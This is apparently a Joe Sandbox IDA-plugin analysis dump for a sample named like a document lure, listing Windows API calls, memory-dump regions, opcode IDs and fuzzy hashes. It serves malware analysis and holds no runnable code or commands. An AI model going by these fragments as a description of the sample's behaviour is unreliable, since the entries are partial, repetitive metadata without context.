                                                        • Opcode ID: 2f16fb5466bf0dabbca9a343d23cd7112b8e68a1c8e7b46c47583778ea6bfe79
                                                        • Instruction ID: 05ba120b36ecc90a5221e64aedbbfd1839faa9d1402e024b9498ec5c13dd9f7f
                                                        • Opcode Fuzzy Hash: 2f16fb5466bf0dabbca9a343d23cd7112b8e68a1c8e7b46c47583778ea6bfe79
                                                        • Instruction Fuzzy Hash: DA412C72A00218AEDB10DFA4CC85ADEB7B8AF49700F108095EA45B7191DB756E89CB61
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007ADBF0,00000000,?,?,?,?), ref: 0077A4E6
                                                        • GetWindowLongW.USER32 ref: 0077A503
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0077A513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: c18b603e612afb93b112c76a8cf05930659719a00a3013e3ba88851d76926d42
                                                        • Instruction ID: 03a98cbb43b6fa3e38a922f6dc158dd194cbb996845dee949efe9bfd008273db
                                                        • Opcode Fuzzy Hash: c18b603e612afb93b112c76a8cf05930659719a00a3013e3ba88851d76926d42
                                                        • Instruction Fuzzy Hash: A431A231200645BBEF218E78CC45BEA7769EB89364F208715F879922E0D779E8619B60
                                                        APIs
                                                        • _memset.LIBCMT ref: 007657E7
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0076581D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: ?Kv$|
                                                        • API String ID: 1413715105-1365364517
                                                        • Opcode ID: aec214edcf99a93aedfcddfdd933d3ba35edf63dd9a3cf2824e4a325646dd535
                                                        • Instruction ID: 3eeff5ba5a6f218d4ca91756d8592940666e29b9be86d151a78b039d7ef37dc3
                                                        • Opcode Fuzzy Hash: aec214edcf99a93aedfcddfdd933d3ba35edf63dd9a3cf2824e4a325646dd535
                                                        • Instruction Fuzzy Hash: 93311B7180011DEBCF11AFA4DC95EEEBFB9FF18310F104015F816A6162DB359A86DBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0077A74F
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0077A75D
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0077A764
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 2ed298aad6eb1a1e38e3bb70702c1362376d7213911a70434f70c1ef9eef7a3e
                                                        • Instruction ID: 46c90a77a97faea7f0d6f6c33ced6268c833ab08b23884965d9f3fd6456ce5cc
                                                        • Opcode Fuzzy Hash: 2ed298aad6eb1a1e38e3bb70702c1362376d7213911a70434f70c1ef9eef7a3e
                                                        • Instruction Fuzzy Hash: 032181B5600205BFEB14DF64DCC5EAB37BDEB493A8B044059FA0597251C774EC11DBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0077983D
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0077984D
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00779872
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 595c7f7829b32dfe5847fe996b7c642486c86c7481980136bfc19f631a7ee633
                                                        • Instruction ID: d4774808a5b1479561e4053da2332f38b8d8b0fbe5df27af7faca310ad27e4e9
                                                        • Opcode Fuzzy Hash: 595c7f7829b32dfe5847fe996b7c642486c86c7481980136bfc19f631a7ee633
                                                        • Instruction Fuzzy Hash: 7B21C531611118BFDF158F54CC85FAB3BAAEF89794F11C125FA085B190C6799C5287A0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0077A27B
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0077A290
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0077A29D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: 5264b7296bbb624508843ebbcb2a4fa972c27fe93b3814304d7aa4b2acdb30a1
                                                        • Instruction ID: 5463c28c00c2227e2dc27f7562b927cb071ae81140310d8ea32a9ff2efcf3ea9
                                                        • Opcode Fuzzy Hash: 5264b7296bbb624508843ebbcb2a4fa972c27fe93b3814304d7aa4b2acdb30a1
                                                        • Instruction Fuzzy Hash: 4211E771200308BAEF205F65CC46FAB3B68FFC9B94F128118FA45A6091D276A851DB60
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00732F79
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00732F80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 2574300362-340411864
                                                        • Opcode ID: ad07d32d238b9c6d0c50a48cf6b404505990e199b64528bc909bd3d7d54dd298
                                                        • Instruction ID: 94933820c3b3d51a17632b146850ca4a899432ace1c68a875276e7a0a1a5796f
                                                        • Opcode Fuzzy Hash: ad07d32d238b9c6d0c50a48cf6b404505990e199b64528bc909bd3d7d54dd298
                                                        • Instruction Fuzzy Hash: 14E01A70695309AAEF606FB0ED49B193775F704B46F00D026B102D10A0DBBE4851DF4C
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00732F4E), ref: 0073304E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00733055
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 2574300362-2819208100
                                                        • Opcode ID: 51d2dd19d66e966e1d99ea0a207616c810fbfa9f2b26c04efe6a7e7501c62656
                                                        • Instruction ID: fd446534654ecc3695c0ea18a780ef378f195d361888774fa330d63ddf300e8b
                                                        • Opcode Fuzzy Hash: 51d2dd19d66e966e1d99ea0a207616c810fbfa9f2b26c04efe6a7e7501c62656
                                                        • Instruction Fuzzy Hash: D6E0B6B0686309ABEB305F61FE0DB193B75B704746F10902AF109D20B0EBBE89508B5C
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 49549a032272fd8ffc3ad708b68c6b7be92a3436fd7d30e36d5a011fb9dc2af8
                                                        • Instruction ID: f541cbe8ffe61e86fb243f3093a14420814f74ee4ae721512232a2de3597f654
                                                        • Opcode Fuzzy Hash: 49549a032272fd8ffc3ad708b68c6b7be92a3436fd7d30e36d5a011fb9dc2af8
                                                        • Instruction Fuzzy Hash: 03E0627188812CEACB58E7909D569BA737CBB04700F54C497B916D1045D73D9B54AB13
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007720EC,?,007722E0), ref: 00772104
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00772116
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetProcessId$kernel32.dll
                                                        • API String ID: 2574300362-399901964
                                                        • Opcode ID: 83344a4b78c9ef2b0aeae18aa61ed9ee4c8e04fe79aca5e8fb12ed95adba46ba
                                                        • Instruction ID: 6f73bc6b631da317ff2dce3837bd776c85a22868a379b87005d57a38369af7c4
                                                        • Opcode Fuzzy Hash: 83344a4b78c9ef2b0aeae18aa61ed9ee4c8e04fe79aca5e8fb12ed95adba46ba
                                                        • Instruction Fuzzy Hash: 1CD0A7755403169FDB306F60F80DB4237D5BB04300B11C81EE75DD2256D77CC882CA14
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0072E6D9,?,0072E55B,007ADC28,?,?), ref: 0072E6F1
                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0072E703
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsWow64Process$kernel32.dll
                                                        • API String ID: 2574300362-3024904723
                                                        • Opcode ID: 8d3deef1624b61439a11214b42ed73757fc0be80c9dcd71edebf31a965693f4f
                                                        • Instruction ID: 3b51b84856222bf504b8aad1ef4fc0126d14a0f1cd604ddd3ad4f73b56ec98c3
                                                        • Opcode Fuzzy Hash: 8d3deef1624b61439a11214b42ed73757fc0be80c9dcd71edebf31a965693f4f
                                                        • Instruction Fuzzy Hash: EAD052B54403228AD7302B24FC4CA833BE9AB04300B11842EE495A2262DAB8C8828A14
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0072E69C,74DF0AE0,0072E5AC,007ADC28,?,?), ref: 0072E6B4
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0072E6C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 934fa591c345569d60d123c4970fdaf9e0f0f710138be5ef07eb50e019a88f0a
                                                        • Instruction ID: 4fac46030bf27cb0b41a74e52802ba3ceeda9bee232f3b076ee203a146e3f8ec
                                                        • Opcode Fuzzy Hash: 934fa591c345569d60d123c4970fdaf9e0f0f710138be5ef07eb50e019a88f0a
                                                        • Instruction Fuzzy Hash: 27D0A7754403228FD7306F31F80CB4237D5AB24701B11A41EE445E2160D77CC8C18618
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0076EBAF,?,0076EAAC), ref: 0076EBC7
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0076EBD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 4b5eaacb9170894a4fcd78f9770e9fd376296e82435afb06eb69cd8113018b3b
                                                        • Instruction ID: a79ef5af2e491933d1a19234f725379b65c208c09be71eb12b0f24cbb5e4d60d
                                                        • Opcode Fuzzy Hash: 4b5eaacb9170894a4fcd78f9770e9fd376296e82435afb06eb69cd8113018b3b
                                                        • Instruction Fuzzy Hash: 19D05EB94443138BD7301F30A848F4137D5AB04304B21C41EE85A92150DA78DC818624
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,0075135F,?,00751440), ref: 00751389
                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0075139B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1071820185
                                                        • Opcode ID: 3455d7b5cf1a082b4ab46769d45f8fcebfa227842271ab9a887c534c83e48844
                                                        • Instruction ID: 18b3ea717542cb8ec65c2b90a79cef23bdec32585bf778c1b7c5c5432e8517b1
                                                        • Opcode Fuzzy Hash: 3455d7b5cf1a082b4ab46769d45f8fcebfa227842271ab9a887c534c83e48844
                                                        • Instruction Fuzzy Hash: 75D0A7728403129FD7300F24F808BC137D6AF04306F05C41EE885D2550DABCCCC49714
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00751371,?,00751519), ref: 007513B4
                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007513C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1587604923
                                                        • Opcode ID: 159a2649dd273bf3995e0e6b04b048aa3b44821bd855dc333f3bbb84f2b194e0
                                                        • Instruction ID: 7071091100d395837b188d9283aec8a931738110b34283ae9656ac35a23fa7b9
                                                        • Opcode Fuzzy Hash: 159a2649dd273bf3995e0e6b04b048aa3b44821bd855dc333f3bbb84f2b194e0
                                                        • Instruction Fuzzy Hash: 1BD0A9B28403169FD7300F24F808B8237EAAF4030AF01842EE895D2660DAFCC885CB18
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00773AC2,?,00773CF7), ref: 00773ADA
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00773AEC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: db0ab0e171b1a4e5cd3b4e1ff630f6fafb614c55444b2aee2efcb93fe74e45f8
                                                        • Instruction ID: a71b853d05eeb1f5871716e57586afe5789532bc754005f42d0ce554013cce1d
                                                        • Opcode Fuzzy Hash: db0ab0e171b1a4e5cd3b4e1ff630f6fafb614c55444b2aee2efcb93fe74e45f8
                                                        • Instruction Fuzzy Hash: 67D052B14403138EEB208B20A80EB4237E9AB11304B02C42EE499A2260EAB8C9808A18
                                                        APIs
                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00766AA6), ref: 0071AB2D
                                                        • _wcscmp.LIBCMT ref: 0071AB49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_wcscmp
                                                        • String ID:
                                                        • API String ID: 820872866-0
